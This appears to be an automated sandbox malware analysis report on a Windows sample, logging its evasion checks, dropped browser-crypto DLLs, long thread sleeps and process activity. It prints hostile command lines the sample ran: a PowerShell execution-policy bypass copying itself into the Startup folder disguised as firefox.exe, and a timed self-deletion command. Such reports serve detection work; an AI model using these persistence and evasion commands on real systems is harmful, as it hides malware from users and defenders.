Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: jd4t3R7hOq.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: firefox.exe PID: 8120, type: MEMORYSTR

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Memory allocated: 19A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Memory allocated: A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Memory allocated: 44F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

7_2_00416B94

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1644	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 564	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2363	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 651	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep count: 1644 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep count: 564 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7912	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708	Thread sleep count: 2363 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708	Thread sleep count: 651 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 500	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,	7_2_004098A0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D0A0 FindFirstFileW,	7_2_0040D0A0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,	7_2_00408D44
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	7_2_00415610
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,	7_2_004087DC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D06E FindFirstFileW,	7_2_0040D06E
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041303C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040989F FindFirstFileW,FindNextFileW,FindClose,	7_2_0040989F
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	7_2_004111C4
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00415610 FindFirstFileW,FindNextFileW,FindClose,	7_2_00415610
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,	7_2_00408D3C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041158C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	7_2_00411590
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D9C

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00416748 GetSystemInfo,

7_2_00416748

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior

Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001557000.00000004.00000020.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001585000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2532467600.000002CE4AA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2535262113.000002CE5005A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1466966401.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1466966401.000000000129B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jd4t3R7hOq.exe, 00000007.00000002.1423629865.0000000001585000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

7_2_00416B94

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0040B15C

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00407A34 mov eax, dword ptr fs:[00000030h]

7_2_00407A34

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\jd4t3R7hOq.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Users\user\Desktop\jd4t3R7hOq.exe "C:\Users\user\Desktop\jd4t3R7hOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: GetLocaleInfoA,		7_2_00416FB8
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: GetLocaleInfoA,		7_2_00404B4C

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Users\user\Desktop\jd4t3R7hOq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
